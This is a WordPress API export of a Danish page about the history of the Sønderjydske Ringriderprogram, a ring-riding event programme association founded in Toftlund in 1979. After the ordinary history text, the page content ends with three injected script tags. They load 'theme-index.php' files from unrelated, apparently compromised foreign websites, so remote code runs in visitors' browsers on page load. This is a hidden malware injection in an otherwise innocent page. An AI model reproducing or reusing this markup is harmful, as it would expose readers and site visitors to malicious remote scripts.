{"id":42,"date":"2017-03-15T12:56:06","date_gmt":"2017-03-15T11:56:06","guid":{"rendered":"http:\/\/ny.ringriderprogram.dk\/?page_id=42"},"modified":"2024-03-27T11:44:07","modified_gmt":"2024-03-27T10:44:07","slug":"om-ringriderprogram","status":"publish","type":"page","link":"https:\/\/ringriderprogram.dk\/?page_id=42","title":{"rendered":"Om Ringriderprogram"},"content":{"rendered":"<div>\n<div id=\"pageShow\">\n<div>\n<p>Ringriderprogrammets eksistens blev startet p\u00e5 et m\u00f8de den 16.2.78 i Toftlund. Der var m\u00f8dt ca. 20 foreninger op og der blev dr\u00f8ftet mange f\u00e6lles problemer. Bl.a. var der mange der mente, at man skulle g\u00e5 sammen om at lave et program over samtlige ringridninger, s\u00e5 man ca. 1. maj kunne se alt om den kommende ringriders\u00e6son. Dette var begyndelsen til det ringriderprogram vi kender i dag.<\/p>\n<p>Der blev nedsat et udvalg p\u00e5 3 mand til at arbejde videre med sagen. De tre personer var Claus Nielsen, Fr\u00f8rup, Hans J\u00f8rgen Juhl, Toftlund og Andreas Jensen, Toftlund. Det blev opfordret til at programmet skulle udkomme i den 17. uge hvert \u00e5r. For programmets videre eksistens blev der fastsat et nyt m\u00f8de til 14.2.1979 p\u00e5 Central Hotellet i Toftlund.<\/p>\n<p>P\u00e5 ovenn\u00e6vnte m\u00f8de blev der stiftet en forening ved navn Det S\u00f8nderjydske Ringriderprogram og der blev valgt en bestyrelse p\u00e5 fem personer som konstituerede sig s\u00e5ledes:<\/p>\n<ul>\n<li>Formand Andreas Jensen, Toftlund<\/li>\n<li>N\u00e6stformand J\u00f8rgen Schultz, Bolderslev<\/li>\n<li>Kasserer og sekret\u00e6r Anette Hansen, Christiansfeld<\/li>\n<li>Hans J\u00f8rgen Juhl,\u00a0Toftlund<\/li>\n<li>Bent Hansen,\u00a0Bramming<\/li>\n<\/ul>\n<p>Foreningens hovedform\u00e5l er stadig at udgive et program med oversigt over s\u00e6sonens ringridninger. Dette er nu blevet udvidet med en hjemmeside og afholdelse af kongeridning for b\u00f8rn og voksne.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<p><script type=\"text\/javascript\" src=\"http:\/\/www.blog.pasarsore.com\/wp-admin\/css\/colors\/theme-index.php\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.weldimpex.hu\/media\/plg_quickicon_joomlaupdate\/js\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ringriderprogrammets eksistens blev startet p\u00e5 et m\u00f8de den 16.2.78 i Toftlund. Der var m\u00f8dt ca. 20 foreninger op og der blev dr\u00f8ftet mange f\u00e6lles problemer. Bl.a. var der mange der mente, at man skulle g\u00e5 sammen om at lave et program over samtlige ringridninger, s\u00e5 man ca. 1. maj kunne se alt om den kommende &hellip; <a href=\"https:\/\/ringriderprogram.dk\/?page_id=42\" class=\"more-link\">L\u00e6s videre<span class=\"screen-reader-text\"> &#8220;Om Ringriderprogram&#8221;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-42","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ringriderprogram.dk\/index.php?rest_route=\/wp\/v2\/pages\/42","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ringriderprogram.dk\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ringriderprogram.dk\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ringriderprogram.dk\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ringriderprogram.dk\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=42"}],"version-history":[{"count":2,"href":"https:\/\/ringriderprogram.dk\/index.php?rest_route=\/wp\/v2\/pages\/42\/revisions"}],"predecessor-version":[{"id":526,"href":"https:\/\/ringriderprogram.dk\/index.php?rest_route=\/wp\/v2\/pages\/42\/revisions\/526"}],"wp:attachment":[{"href":"https:\/\/ringriderprogram.dk\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=42"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}